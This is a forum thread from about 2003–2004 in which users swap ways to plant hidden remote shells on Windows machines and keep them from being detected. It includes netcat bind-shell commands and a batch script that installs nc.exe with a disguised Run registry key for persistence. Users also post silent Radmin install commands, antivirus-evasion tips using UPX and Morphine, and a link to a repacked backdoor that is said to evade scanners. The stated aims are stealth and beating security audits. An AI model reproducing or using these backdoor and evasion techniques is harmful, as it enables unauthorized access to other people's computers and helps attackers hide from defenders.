Hey guys need some help. Whats the best program to use on a windows machine that will listen on a certain port, that i can telnet to and get a shell.
I looked into rsh.exe and rshd.exe, havent had much luck with them. And I also searched this forum, with most results talking about the shell you get after you sploit the box. I need a small dos prog i can setup as a service that will give me a shell when i telnet to it.
Also encryption and stealth (beating a security audit) are features that would come in handy.
Thanks guys.
Full Version: Installing A Remote Shell
i think the best one to do this job (because u can configure it the way u want) is winshell 5.0, and the most important thing is that antivirus doesnt seem to detect it.
here u can grabit.
here u can grabit.
Thanks for the help I'll check it out. It seems Symantec (Norton Anti-Virus) finds it.
http://securityresponse.symantec.com/avcen...shell.50.b.html
Anyone got a shell that isnt classified as a Backdoor trojan, or hack tool?
http://securityresponse.symantec.com/avcen...shell.50.b.html
Anyone got a shell that isnt classified as a Backdoor trojan, or hack tool?
if u up and execute the file on system volume information u can use it without prob because NAV doesnt scan by default that section.
Netcat ....
nc.exe -l -d -p port -e cmd.exe
nc.exe -l -d -p port -e cmd.exe
Netcat ....
nc.exe -L -d -p port -e cmd.exe
Make it a uppercase "-L" if you want the shell to respawn after you exit
nc.exe -L -d -p port -e cmd.exe
Make it a uppercase "-L" if you want the shell to respawn after you exit
try icmd.exe, u can setup a pass.... with netcat everyone can connect if they find the port.
damn icmd.exe is detected too. Anyone got some good links to tuts on changing some bytes around to avoid most A/V?
i believe the term is called "packing" probs the most common packer is upx..
there are other ones, you dont need to compress either. can just encrypt it.
nortons is gettting pretty good with detecting upx'd files to now.. perfect example is sdbot
Sparkles
there are other ones, you dont need to compress either. can just encrypt it.
nortons is gettting pretty good with detecting upx'd files to now.. perfect example is sdbot
Sparkles
The winshell server maker is detected, but the winshell server itself is not detected. I am on Norton Antivirus 2004 Pro, with the latest definitions and it doesnt have a clue about the winshell server. remember that you can make it different sizes.
you can also just install radmin which gives u telnet acces as a option..the files you need to upload r
AdmDll.dll
r_server.exe
radmin.reg---you need to get the reg files from your registry
Here are the commands to start it
regedit.exe /s radmin.reg
r_server.exe /install /silence
r_server.exe /start
hope this helped ya
AdmDll.dll
r_server.exe
radmin.reg---you need to get the reg files from your registry
Here are the commands to start it
regedit.exe /s radmin.reg
r_server.exe /install /silence
r_server.exe /start
hope this helped ya
problem with radmin its obvious inthe services listing (cant remember if you can change it with out brekaing it)
Sparkles
Sparkles
| QUOTE (krackatoa @ Sep 14 2003, 11:40 PM) |
| Make it a uppercase "-L" if you want the shell to respawn after you exit |
Thanks, that helps me much out
Try cryptcat. Should do the job, plus provides point-to-point encryption..
so i'll try the radmin. idon't really care if it's listed in the services list.
when u sing netcat witl the -L option, the port will be open all the time as i understood. how can you hold the backdoor open after a restart ?
install that command as firedaemon service ? or is there a better way ?
when u sing netcat witl the -L option, the port will be open all the time as i understood. how can you hold the backdoor open after a restart ?
install that command as firedaemon service ? or is there a better way ?
Can't rember what the tool is called but check out Hacking Exsposed Win2k. It's a simple way. Sorry not much use, my copy is packed away 
hi, i compressed the tool icmd.exe with the upx packer so it wasn detected anymore by norton coporate edition. can you check if it is also not detected by other virus scanners, thx
http://212.202.50.233:88/icmd.zip
I tested it with 4 email virus scanner, but it wasnt detected.
http://212.202.50.233:88/icmd.zip
I tested it with 4 email virus scanner, but it wasnt detected.
Wolf 1.6 from xfocus.org isnt too bad, u can change the service name to what ever u want , have it password controled, pack it or use a UPX scrambler or Morphine12 to make it undetectable.
cheers
cheers
@SNOZZ:
Also, you can try to find older versions of Wolf. AFAIK some don't get detected at all but they work fine.
Also, you can try to find older versions of Wolf. AFAIK some don't get detected at all but they work fine.
using packers and morphine and adding bytes tools , u can make winshell undetected i did that !
@ boshcash can you give me that tools?
big thx
big thx
WinShell 0WNz 
nc is very good
As per one of the previous posters - cryptcat (nc.exe encrypted) will fullfill your needs:
Can listen on any port or go out on any port.
DES encryption (good foor getting around IDS)
Can reverse cmd.exe back as well.. (Good as a back door)
Can listen on any port or go out on any port.
DES encryption (good foor getting around IDS)
Can reverse cmd.exe back as well.. (Good as a back door)
| QUOTE |
| As per one of the previous posters - cryptcat (nc.exe encrypted) will fullfill your needs: Can listen on any port or go out on any port. DES encryption (good foor getting around IDS) Can reverse cmd.exe back as well.. (Good as a back door) |
Thx a lot for this really useful tip .
I think the best way to accomplish this is to make a batch calling netcat, and keeping it on a certain port, returning cmd.exe. Someone beat me to posting the code to do it... read up.
Some usefull replies ... THX 
Norton Antivirus does not detect the server program... it only detects the "builder"
I tried it to detect with NAV 2004 + newest updates
I tried it to detect with NAV 2004 + newest updates
is it to possible bind netcat with flags (nc -L -p <port> -e cmd.exe -d -vv) to an exe file using upx?
netcat is greet, but i didn't know a method for install the netcat with a service.
If u use the flag -L, u can enter in the server until that the server will be restarting...
nobody it knows a method to install a service for netcat?
bye and sorry for my english
If u use the flag -L, u can enter in the server until that the server will be restarting...
nobody it knows a method to install a service for netcat?
bye and sorry for my english
but what if i bind netcat with the exe file and also bind a batch file to install netcat? In other words, bind both netcat and the batch file together with the exe file?
yea...netcat is probably he best idea
nc is the greatest
If you want encryptiont then you could use cryptcat, which is basically exactly the same as netcat, but encrypted 
netcat is like a swiss army knife !
Grrrr, you CAN give netcat a password!!
Take a look at this post: Giving Netcat Password Functionality
(I do admit however, that it might not be the easiest of things.)
-ed.
Take a look at this post: Giving Netcat Password Functionality
(I do admit however, that it might not be the easiest of things.)
-ed.
Everyone keeps talking about a tool called Morphine to encrypt files, but I cant seem to find it anywhere. All i get in google are preformance enchancing drugs. =P
Where might it be?
Where might it be?
a simple way to make netcat run at every start up is to make a batch file with the code below
| CODE |
@echo off move nc.exe %systemroot%\system32 move reg.exe %systemroot%\system32 start %systemroot%\system32\nc.exe -L -d -e cmd.exe -p 69 REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v Rundllcms /t REG_SZ /d "%systemroot%\system32\nc.exe -L -d -e cmd.exe -p 69" exit |
change the port to whatever you want and you can change Rundllcms to the name you want for the registry entry
hope this helps some of ya
edit
nvm
nvm
im having trouble with winshell i actually dont know how to login, i have netcat workin well and as a service but i want to get things more secure .. i install it and start the service but how do i login i see the C:\>telnet xxx.xxx.xxx.xxx 5277 but it cant connect when i put ip windows gives me an error .. i dont have a telnet either is that it? im lost please help
oops sorry for the dumb post ^^ i got it workin ima a total newb 
i use srvcmd.exe. but there is no password protection. it runs hidden and you can choose port where you want to connect to via telnet.
passiw but as your program is used ??
which it is the exact command?
thx u bye
which it is the exact command?
thx u bye
ive had some sucess with this.
| QUOTE (Fractured @ Dec 22 2003, 08:28 AM) |
| Everyone keeps talking about a tool called Morphine to encrypt files, but I cant seem to find it anywhere. All i get in google are preformance enchancing drugs. =P Where might it be? |
i noticed that the link above is a dead link , anyone cant find morphine tell me
can ppl just but the file in the posting it is easer for ppl
i would suggest radmin, its very useful
like a lot of ppl said.. netcat is pretty good
like a lot of ppl said.. netcat is pretty good
| QUOTE (boshcash @ Jan 5 2004, 02:46 PM) |
| i noticed that the link above is a dead link , anyone cant find morphine tell me |
geee just open yer eyes ... look
http://rootkit.host.sk/tools/Morphine12.zip
file doesn't download but hell you need it so bad that you try:
http://rootkit.host.sk/tools/
OHH a web page, ohh there are also links on that page !!!! clap clap *applause* !!! you made it !!!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
